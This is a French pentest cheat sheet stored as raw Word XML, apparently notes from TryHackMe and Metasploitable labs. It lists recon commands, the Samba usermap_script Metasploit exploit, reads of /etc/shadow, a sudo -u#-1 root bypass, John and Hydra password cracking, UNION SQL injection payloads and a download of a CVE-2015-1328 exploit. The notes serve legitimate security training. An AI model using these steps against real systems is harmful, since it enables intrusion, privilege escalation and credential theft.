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750F" w14:textId="0EEF9ADC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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pP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>Mes outils</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD3C5AD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6532FD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ENUMERATION PORTS DES HOSTS EN LIGNE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E916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nmap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-PE 192.168.189.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD483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ENUMÉRATION OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC8C62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nmap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-O 192.168.189.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67251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ENUMÉRATION DES SERVICES OUVERTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520658B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nmap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sV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192.168.189.136`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886464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 xml:space="preserve">enum4linux -a 10.0.2.5 |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grep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-v -F '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unknown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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324253C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RECHERCHE DÉTAILLÉE SUR LES SERVICES SMB PORT 139 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3593DDA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nmap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sV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sC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-p 139 445 192.168.189.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ABB8B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nmap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-p 139 445 --script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smb-enum-shares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192.168.189.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD95AC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RECHERCHE VULNÉRABILITÉ SUR SAMBA SMBD 3.0.20-DEBIAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B930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searchsploit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samba 3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C34EA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Metasploit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Documentation: https://docs.metasploit.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC31F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search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msf6 &gt;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search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samba 3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E064C9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PRÉPARATION DE L'ATTAQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B41D1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msf6 exploit(multi/samba/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usermap_script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) &gt; set RHOSTS 192.168.189.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD8B1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LANCEMENT DE L'ATTAQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525EF6D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msf6 exploit(multi/samba/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usermap_script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) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203029D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PRIVILEGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0E1A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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C9CF23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>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C053D9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 xml:space="preserve">cat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shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50197FD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  <w:t xml:space="preserve">cat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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D49F96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       ls .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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19F0C06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openssl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rsa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-in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rsa_key_mexpl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text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noout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4411F1E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7F7922F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CEH : EH_6zj+"nV4r,C3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65407DC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76273AB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5A03D05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sudo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-u#-1 /bin/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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F5BDE3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267AFB4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3ECC652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TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="425278E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0F595B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87DEFE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Printing the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passwd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files to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see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which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users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are on the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269BAD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cat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/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|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cut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-d ":" -f 1^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3204A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Look for files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with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the SUID bit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA45A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find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/ -perm -u=s -type f 2&gt;/dev/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null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="107DF0B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Attack sur </w:t>
      </w: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shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A88F51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>base64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| base64 --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decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="032F9EA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/bin/base64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/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| base64 --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decode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&gt; passwd.txt/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/bin/base64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/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| base64 --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decode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&gt; shadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E5DC4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passwd.txt shadow.txt &gt; passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113FB24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john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wordlist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=/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wordlists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/rockyou.txt passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A770F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59A664E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Kali Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A380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sudo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-i 's/non-free$/non-free non-free-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firmware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/'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apt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sources.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EC4484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B15763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wget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https://archive.kali.org/archive-key.asc -O /etc/apt/trusted.gpg.d/kali-archive-key.as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01647B8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6E41E1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/about/0 UNION ALL SELECT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group_concat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column_name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),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null,null,null,null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FROM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information_schema.columns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WHERE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table_name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="people"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78636B1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90F432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/about/0 UNION ALL SELECT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group_concat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colomn_name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),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null,null,null,nul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FROM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information_schema.colomns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WHERE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table_name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="people" HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79910F6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D08DE8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84CA68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4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https://www.youtube.com/watch?v=_yTzG9z7Duc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F9E1EB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SMB Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500DA58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TCP 445 , 139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695063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E1C265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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68F8114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service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postgresql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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBAEA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msfconsole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-q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29138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workspace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metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78DF762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  <w:t>Hosts  / Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC50BB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db_nmap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sV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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F390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Services —&gt;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Vuln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Versus OS Release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211BC1A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db_nmap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sV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-p 445,139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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1AE3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  <w:t>information sur config SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE444F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Maintenant nous passons sur des outils dédiés SMB_EH (Kali) pour découverte et EH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35EC2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smbclient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sharename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4BB07D4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smbclient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-N -L //&lt;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&gt;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</w:p>
    <w:p w14:paraId="4CC253E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smbmap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ab/>
        <w:t>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permissipn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sharename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561A63B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smbmap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-H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&gt;   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</w:p>
    <w:p w14:paraId="4D71562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smbclient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access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1002DFC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smbclient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//&lt;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direcroty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&gt; -U  ¨¨%¨¨</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E8A7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enum4linux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complete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enumeration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3522B62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  <w:t>enum4linux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&gt; -a !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Grep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-v -F ‘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unkown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’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB37FA4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rpcclient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additionnal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information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74347F4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rpcclient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-U ‘%’ &lt;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ipaddr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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02E82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Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1391370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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44F7C72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smb_login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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F057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hydra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(brute force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA0B2B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hydra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-L users.txt -P /wordlist.txt smb://&lt;ipaddr&gt; -t 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F406D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Vulnerabilty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et Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B75E7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recherche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vuln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Sur la version de Samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AEE41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utilisation d’un script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metasploit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(si existe…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3771852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accès en tant que root   /bin/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bash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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CE1A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   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>cat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</w:p>
    <w:p w14:paraId="1E38E8D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récupération du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via root (shadow.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849EDB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cat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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1730EB8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récupération du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password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via root (passwd.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9864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crack du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</w:p>
    <w:p w14:paraId="3030DD2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passer.txt shadow.txt &gt; unshadowed.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA21EED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john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—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wordlist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=/home/kali/rockyou.txt unshadowed.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F89558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2A3A17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ssh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rsa_msfadmin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msfadmin@10.0.2.5 -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oHostKeyAlgorithms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=+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ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A76489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6CCAEF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For J:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3560095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I've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been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auditing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the contents of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make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sure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don't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have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any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weak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credentials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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053853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and 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able to crack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hash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really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easily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You know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password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policy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please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follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A0EF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? Change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password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ASAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D8D0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-K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3067F0D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1E8FB4BD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018-04-23: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I've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been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messing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with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struts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stuff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and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it's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pretty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cool! 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think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might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neat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A156C7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to host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on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server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Haven't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made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any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real web apps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, but I have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tried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example</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72EEAE6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 show off how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works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(and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it's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the REST version of the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example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!). Oh, and right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now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I'm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</w:p>
    <w:p w14:paraId="49A48BF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lastRenderedPageBreak/>
        <w:t>using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version 2.5.12,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because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other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versions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were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giving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me trouble. -K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A5C9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2018-04-22: SMB has been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configured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-K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE1EB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2018-04-21: I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got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Apache set up. Will put in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our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content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later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. -J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D058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DD91A7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CD89FE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Announcement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 staff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7AE03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PLEASE do not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upload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non-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work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related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items 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I know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it's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all in fun, but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9926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is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how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mistakes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happen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. (This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means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you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too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, Jan!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A713D6D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-Kay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E3C3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567E31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Hydra pour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password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Brute-Force sur le compte de Jan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80BC0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Linpeas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(Linux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Privilégiâtesge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Escalation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) —&gt; découverte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private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RSA Key  (de Kay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA595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ssh2jhon (conversion pour utilisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E02680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D5D8CF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—————————</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5B0F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492569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Challenge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ToysRus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D10792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C04C40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22/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tcp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  open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ssh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   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OpenSSH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7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux;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protocol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2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0377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 xml:space="preserve">|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ssh-hostkey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: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDFAF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   2048 23c4d7443533c673430fb317afd2f440 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5100C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   256 23e29397ccd10149a3cb1ecf5f22a423 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A971394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  256 ba35cc0016d799a0a13a7e8ddb38e2a8 (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6ED6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80/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tcp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  open  http    Apache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httpd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2.4.18 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E840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|_http-server-header: Apache/2.4.18 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCB55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|_http-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title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: Site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doesn't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have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title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text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/html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4F97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1234/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tcp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open  http    Apache Tomcat/Coyote JSP engine 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2E24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|_http-favicon: Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCFC9C3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|_http-server-header: Apache-Coyote/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7BFD0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|_http-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title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 Apache Tomcat/7.0.88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5EDE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8009/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tcp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open  ajp13   Apache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Jserv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(Protocol v1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A5596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|_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ajp-methods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Failed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a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valid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response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for the OPTION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request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="126419D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MAC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Address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 02:0B:BE:5E:B4:43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Unknown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253F2664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Service Info: OS: Linux; CPE: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cpe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o:linux:linux_kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02B09E6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CB9814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Dirbuster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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0581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200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395EFFD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  <w:t>Guidelines —&gt; User : bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8953B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lastRenderedPageBreak/>
        <w:t>401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C6174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ab/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Protected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(Basic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Authentication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721362C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CC22D2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Hydra : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A697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hydra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-l bob -P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share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wordlists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/rockyou.txt http-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:/10.10.82.36/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protected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71BCB44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F5DBF1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5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https://iritt.medium.com/tryhackme-toysrus-challenge-writeup-aebc68a29413</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A79D74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F45E3D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6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https://iritt.medium.com/wireshark-the-basics-wireshark-tryhackme-walkthrough-81a83079c121</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="274194F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9FD22A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7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https://medium.com/@laupeiip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F27F0E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A50E41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8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https://medium.com/@haircutfish</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C4C40D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45F7DA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9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https://medium.com/@athu.patil03</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E65111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64E796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0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https://tryhackme.com/room/wiresharkthebasics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B932AA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7D8D74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1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https://medium.com/@akashfalaskar/tryhackme-passive-reconnaissance-walkthrough-824d6a8656e0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64C8CED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6B3B91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2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https://medium.com/@infosecnubes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37D1716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8F8CE3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3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https://medium.com/@tolentinojesusanthony</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C0C049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4193BB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4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https://www.jalblas.com/blog/tryhackme-linux-privilege-escalation-walkthrough/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0714EF7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933782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5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https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56964F4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F6C5D7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6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https://dnsdumpster.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B497B2F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D07B0B0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7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https://medium.com/@akashfalaskar/tryhackme-passive-reconnaissance-walkthrough-824d6a8656e0</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B12180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030479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8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https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77383D0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38A446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19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https://github.com/rebootuser/LinEnum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A7018C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2973B54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20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https://appdevtools.com/base64-encoder-decoder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 xml:space="preserve">    (boite à outils)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE51F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59B3D2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21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https://www.srihash.org/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 xml:space="preserve">    (hash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generator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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F860BD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481D92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22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https://gtfobins.github.io/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>.   (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list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of Unix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binaries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that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can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be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used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to bypass local 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security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restrictions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74748C06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62CC0B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23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https://ex0a.medium.com/tryhackme-owasp-juice-shop-53e87fb1af36</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DEABE3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18F4C1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24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https://www.jalblas.com/blog/thm-linux-privilege-escalation-walkthrough/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51671CF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7BCE3CC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hyperlink r:id="rId25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
            <w:kern w:val="0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report/blob/master/README.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (rapports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FEF929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1DA96367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657212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57A00B5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hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
            <w:b/>
            <w:bCs/>
            <w:kern w:val="0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://tryhackme.com/paths</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31DF121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>CompTIA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pentest+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C508BD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02ED3074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Liens vers le site officiel et les repos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606873EE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🧷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://caido.io/fr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22346E98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🧷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>https://lnkd.in/exSb-F9H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508394B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62EDD02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——————————</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856680A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CVE-2015-1328. —&gt; 3.13.0-24-generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2309C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Ubuntu 14.04 LTS —&gt; Python 2.7.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516F968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40EDB7C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wget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https://raw.githubusercontent.com/DarkenCode/PoC/refs/heads/master/CVE-2015-1328/CVE-2015-1328.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB0B3EB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kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F34205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/bin/base64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| base64 --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decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A389932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/bin/base64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passwd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| base64 --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decode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&gt; passwd.txt/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usr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/bin/base64 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etc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>/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shadow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| base64 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; shadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A1C21" w14:textId="77777777" w:rsidR="00EE46E7" w:rsidRDefault="00EE46E7" w:rsidP="00EE46E7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36DDC99B" w14:textId="77777777" w:rsidR="00C73C79" w:rsidRDefault="00C73C79"/>
    <w:sectPr w:rsidR="00C73C79" w:rsidSect="00EE46E7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E7"/>
    <w:rsid w:val="0029721A"/>
    <w:rsid w:val="00971620"/>
    <w:rsid w:val="00C129CF"/>
    <w:rsid w:val="00C73C79"/>
    <w:rsid w:val="00E275DF"/>
    <w:rsid w:val="00EE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07668E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3295F95C-8A96-9644-AE62-B5785ED6F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46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46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46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46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46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46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46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46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46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46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46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46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46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46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46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46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46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4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haircutfish" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@tolentinojesusanthony" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/path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rihash.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@laupeiip" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@infosecnubes" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@akashfalaskar/tryhackme-passive-reconnaissance-walkthrough-824d6a8656e0" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report/blob/master/README.md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nsdumpster.com/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appdevtools.com/base64-encoder-decoder" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iritt.medium.com/wireshark-the-basics-wireshark-tryhackme-walkthrough-81a83079c121" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@akashfalaskar/tryhackme-passive-reconnaissance-walkthrough-824d6a8656e0" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jalblas.com/blog/thm-linux-privilege-escalation-walkthrough/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iritt.medium.com/tryhackme-toysrus-challenge-writeup-aebc68a29413" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ex0a.medium.com/tryhackme-owasp-juice-shop-53e87fb1af36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tryhackme.com/room/wiresharkthebasics" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=_yTzG9z7Duc" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@athu.patil03" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jalblas.com/blog/tryhackme-linux-privilege-escalation-walkthrough/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io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1317</Words>
  <Characters>7247</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>60</Lines>
  <Paragraphs>17</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8547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Cdt Sergio</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cdt Sergio</cp:lastModifiedBy>
